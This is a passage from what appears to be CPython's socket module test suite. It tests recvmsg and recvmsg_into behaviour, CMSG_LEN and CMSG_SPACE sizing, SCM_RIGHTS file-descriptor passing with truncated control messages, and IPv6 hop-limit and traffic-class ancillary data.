# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter read).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
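# Illustrative sketch (not part of the test suite): how CMSG_LEN() and
# CMSG_SPACE() are used to size ancillary-data buffers, e.g. for the
# SCM_RIGHTS file-descriptor passing tested below. Assumes a platform that
# exposes the CMSG_* macros (POSIX); elsewhere it simply returns None.
def _example_cmsg_buffer_sizes(numfds=4):
    import array
    import socket
    if not (hasattr(socket, "CMSG_LEN") and hasattr(socket, "CMSG_SPACE")):
        return None
    payload = numfds * array.array("i").itemsize
    # CMSG_LEN() is the exact length of one control message carrying
    # `payload` bytes; CMSG_SPACE() additionally accounts for alignment
    # padding, so it is the value to use when sizing a receive buffer.
    exact = socket.CMSG_LEN(payload)
    padded = socket.CMSG_SPACE(payload)
    assert padded >= exact >= payload
    return exact, padded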
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
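# Illustrative sketch (not part of the test suite) of the SCM_RIGHTS mechanism
# exercised by SCMRightsTest above: one end serializes a file descriptor into
# an ancillary data item with sendmsg(), and the other end recovers a new
# descriptor for the same open file from recvmsg().  The caller owns (and must
# close) any descriptors returned.
def _scm_rights_sketch(fd_to_send):
    needed = ("AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS", "CMSG_SPACE")
    if not all(hasattr(socket, name) for name in needed):
        return None
    if not (hasattr(socket.socket, "sendmsg") and hasattr(socket.socket, "recvmsg")):
        return None
    left, right = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    with left, right:
        left.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                               array.array("i", [fd_to_send]))])
        msg, ancdata, flags, addr = right.recvmsg(1, socket.CMSG_SPACE(SIZEOF_INT))
        received = array.array("i")
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                # Keep only whole integers, as closeRecvmsgFDs() does above.
                received.frombytes(cmsg_data[:
                    len(cmsg_data) - (len(cmsg_data) % received.itemsize)])
        return list(received)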
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
